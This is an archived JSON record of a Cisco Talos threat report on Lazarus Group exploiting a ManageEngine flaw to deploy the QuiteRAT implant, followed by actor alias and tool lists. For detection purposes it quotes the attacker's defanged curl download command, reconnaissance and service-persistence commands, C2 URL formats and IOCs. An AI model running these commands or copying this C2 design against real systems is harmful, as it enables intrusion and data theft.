{
	"id": "4b7d474f-d983-4b78-a760-7c5c48b93b92",
	"created_at": "2026-04-06T00:14:29.232636Z",
	"updated_at": "2026-04-10T03:38:20.098931Z",
	"deleted_at": null,
	"sha1_hash": "cdb7237a581b6e98420f4fa2b592af10298c1b23",
	"title": "Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 550858,
	"plain_text": "Lazarus Group exploits ManageEngine vulnerability to deploy\r\nQuiteRAT\r\nBy Asheer Malhotra\r\nPublished: 2023-08-24 · Archived: 2026-04-05 21:48:30 UTC\r\nThursday, August 24, 2023 08:02\r\nCisco Talos discovered the North Korean state-sponsored actor Lazarus Group targeting internet backbone\r\ninfrastructure and healthcare entities in Europe and the United States. This is the third documented\r\ncampaign attributed to this actor in less than a year, with the actor reusing the same infrastructure\r\nthroughout these operations.\r\nIn this campaign, the attackers began exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-\r\n47966) five days after PoCs for the exploit were publicly disclosed to deliver and deploy a newer malware\r\nthreat we track as “QuiteRAT.” Security researchers first discovered this implant in February, but little has\r\nbeen written on it since then.\r\nQuiteRAT has many of the same capabilities as Lazarus Group’s better-known MagicRAT malware, but its\r\nfile size is significantly smaller. Both implants are built on the Qt framework and include capabilities such\r\nas arbitrary command execution.\r\nLazarus Group’s increasing use of the Qt framework creates challenges for defenders. It increases the\r\ncomplexity of the malware’s code, making human analysis more difficult compared to threats created using\r\nsimpler programming languages such as C/C++, DOT NET, etc. Furthermore, since Qt is rarely used in\r\nmalware development, machine learning and heuristic analysis detection against these types of threats are\r\nless reliable.\r\nLazarus Group compromises internet backbone infrastructure company in Europe\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nPage 1 of 10\n\nIn early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider\r\nin Europe to successfully deploy QuiteRAT. 
The actors exploited a vulnerable ManageEngine ServiceDesk\r\ninstance to gain initial access. The successful exploitation triggered the immediate download and execution of a\r\nmalicious binary via the Java runtime process. We observed Lazarus Group use the cURL command to\r\nimmediately deploy the QuiteRAT binary from a malicious URL:\r\ncurl hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat -o c:\\users\\public\\notify[.]exe\r\nThe IP address 146[.]4[.]21[.]94 has been used by Lazarus since at least May 2022.\r\nA successful download of the binary leads to the execution of the QuiteRAT binary by the Java process, resulting\r\nin the activation of the implant on the infected server. Once the implant starts running, it sends out preliminary\r\nsystem information to its command and control (C2) servers and then waits on the C2 to respond with either a\r\ncommand code to execute or an actual Windows command to execute on the endpoint via a child cmd.exe process.\r\nSome of the initial commands executed by QuiteRAT on the endpoint are for reconnaissance:\r\nCommand: C:\\windows\\system32\\cmd.exe /c systeminfo | findstr Logon\r\nIntent: Get logon server name (machine name). System Information Discovery [T1082]\r\nCommand: C:\\windows\\system32\\cmd.exe /c ipconfig | findstr Suffix\r\nIntent: Domain name for the system. Domain discovery [T1087/002]\r\nThere is no in-built persistence mechanism in QuiteRAT. Persistence for the implant is achieved via the registry by\r\nissuing the following command to QuiteRAT:\r\nC:\\Windows\\system32\\cmd[.]exe /c sc create WindowsNotification type= own type= interact start= auto\r\nerror= ignore binpath= cmd /K start c:\\users\\public\\notify[.]exe\r\nA typical infection chain looks like this:\r\nLazarus Group evolves malicious arsenal with QuiteRAT\r\nQuiteRAT is a fairly simple remote access trojan (RAT). It consists of a compact set of statically linked Qt\r\nlibraries along with some user-written code. The Qt framework is a platform for developing cross-platform\r\napplications; it is, however, especially popular for developing graphical user interfaces in applications. Although\r\nQuiteRAT, just like MagicRAT, uses embedded Qt libraries, neither of these implants has a graphical user\r\ninterface. As seen with Lazarus Group’s MagicRAT malware, the use of Qt increases the code complexity,\r\nmaking human analysis harder. Using Qt also makes machine learning and heuristic analysis detection less\r\nreliable, since Qt is rarely used in malware development.\r\nBased on QuiteRAT’s technical characteristics, including the usage of the Qt framework, we assess that this\r\nimplant belongs to the previously disclosed MagicRAT family. QuiteRAT was briefly discussed in WithSecure’s\r\nreport from early 2023. The new campaign we’re disclosing exploited a ManageEngine ServiceDesk vulnerability\r\n(CVE-2022-47966) — which has a Kenna risk score of 100 out of 100 — to deploy QuiteRAT.\r\nThe implant initially gathers some rudimentary information about the infected endpoint, including MAC\r\naddresses, IP addresses, and the current user name of the device. This information is then arranged in the format:\r\n\u003cMAC_address\u003e\u003cIP_address\u003e[0];\u003cMAC_address\u003e\u003cIP_address\u003e[1];...\u003cMAC_address\u003e\u003cIP_address\u003e[n];\u003cusername\u003e\r\nThe resulting string is then used to calculate an MD4 hash, which is then used as the infection identifier (victim\r\nidentifier) while conversing with the C2 server.\r\nAll the networking-related configurations, such as the C2 URLs and extended URI parameters, are encoded and\r\nstored in the malware. The strings are XOR’ed with 0x78 and then base64 encoded. This technique is in line with\r\nWithSecure’s analysis from earlier this year.\r\nConfiguration strings encoded in the malware.\r\nThe URL to communicate with the C2 is constructed with the following extended URI parameters:\r\nParameter | Values | Description\r\nmailid | \u003c12 chars from MD4\u003e | The first 12 characters from the MD4 of the information gathered from the endpoint (described earlier)\r\naction | “inbox” = send check beacon; “sent” = data is being sent to C2 | Signifies the action being taken\r\nbody | \u003cbase64_xorred_data\u003e | Data to be sent to C2.\r\nparam | \u003cInternal/Local IP address\u003e | The internal/LAN IP address of the infected endpoint.\r\nsession | \u003crand\u003e | Pseudo-random number generated by the implant.\r\nThe URL for the HTTP GET to obtain inputs from the C2 looks like this:\r\n\u003cC2_URL\u003e/mailid=\u003c12chars_MD4\u003e\u0026action=inbox\u0026param=\u003cInternal/Local_IP_address\u003e\u0026session=\u003crand\u003e\r\nData is also sent to the C2 using the HTTP GET verb. The URL for the HTTP GET to send data to the\r\nC2 looks like this:\r\n\u003cC2_URL\u003e/mailid=\u003c12chars_MD4\u003e\u0026action=sent\u0026body=\u003cbase64_xorred_data\u003eparam=\u003cInternal/Local_IP_address\u003e\u0026session=\u003crand\u003e\r\nAny data sent to the C2 is at most 0x400 (1,024) bytes in length. If the output of a command executed on the\r\nendpoint by the implant is larger than 1,024 bytes, the implant appends the \u003c No Pineapple! \u003e marker at the end\r\nof the data.\r\nThe User-Agent used during communications by the implant is\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0\r\nThe malware also has the ability to run a ping command on a random IP address that it generates on the fly. The\r\nrequest is usually executed using the command \u003ccompspec_path\u003e\\cmd.exe /c \u003cIP_Address\u003e -n 18 \u0026 :\r\nPing command being constructed by the implant including the octets for a random IP.\r\nThe implant can also receive a command code “sendmail” along with a numeric value from the C2 server. This\r\nvalue is then used by the implant to sleep for a specific period of time (in minutes) before it begins talking to the\r\nC2 server again. The adversaries likely use this functionality to keep the implant dormant for longer periods of\r\ntime while ensuring continued access to the compromised enterprise network.\r\nThe implant also has the ability to receive a second URL from the current C2 server via the command code\r\n“receivemail”. The implant will then reach out to the second URL to receive commands and payloads from the\r\nserver to execute on the infected system.\r\nWe have seen the following versions of QuiteRAT in the wild. We are only able to share one of the file hashes at\r\nthis time, which is included in the IOCs section:\r\nQuiteRAT binary name | Compile date\r\nnotify.exe (32bit) | May 30, 2022\r\nacres.exe | July 22, 2022\r\nacres.exe (64bit) | July 25, 2022\r\nThe latest version of Lazarus Group’s older MagicRAT implant observed in the wild was compiled in April 2022.\r\nThis is the last version of MagicRAT that we know of. The use of MagicRAT’s derivative implant, QuiteRAT,\r\nbeginning in May 2023 suggests the actor is changing tactics, opting for a smaller, more compact Qt-based\r\nimplant.\r\nQuiteRAT vs MagicRAT\r\nQuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging\r\naround 18MB in size, QuiteRAT is a much smaller implementation, averaging around 4 to 5MB in size. This\r\nsubstantial difference in size is due to Lazarus Group incorporating only a handful of required Qt libraries into\r\nQuiteRAT, as opposed to MagicRAT, in which they embedded the entire Qt framework. Furthermore, while\r\nMagicRAT consists of persistence mechanisms implemented in it via the ability to set up scheduled tasks,\r\nQuiteRAT does not have a persistence capability and needs to be issued one by the C2 server to achieve continued\r\noperation on the infected endpoint. This is another contributing factor to the smaller size of QuiteRAT.\r\nThere are similarities between the implants that indicate that QuiteRAT is a derivative of MagicRAT. Apart from\r\nbeing built on the Qt framework, both implants consist of the same abilities, including running arbitrary\r\ncommands on the infected system. Both implants also use base64 encoding to obfuscate their strings with an\r\nadditional measure, such as XOR or prepending hardcoded data, to make it difficult to decode the strings\r\nautomatically. Additionally, both implants use similar functionality to allow them to remain dormant on the\r\nendpoint by specifying a sleep period for them by the C2 server.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nIOCs\r\nIOCs for this research can also be found at our Github repository here.\r\nHashes\r\nQuiteRAT\r\ned8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6\r\nNetwork IOCs\r\n146[.]4[.]21[.]94\r\nhxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat\r\nhxxp[://]146[.]4[.]21[.]94/tmp/tmp/log[.]php\r\nhxxp[://]146[.]4[.]21[.]94/tmp/tmp/logs[.]php\r\nhxxp[://]ec2-15-207-207-64[.]ap-south-1[.]compute[.]amazonaws[.]com/resource/main/rawmail[.]php\r\nSource: https://blog.talosintelligence.com/lazarus-quiterat/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/lazarus-quiterat/"
	],
	"report_names": [
		"lazarus-quiterat"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434469,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cdb7237a581b6e98420f4fa2b592af10298c1b23.pdf",
		"text": "https://archive.orkl.eu/cdb7237a581b6e98420f4fa2b592af10298c1b23.txt",
		"img": "https://archive.orkl.eu/cdb7237a581b6e98420f4fa2b592af10298c1b23.jpg"
	}
}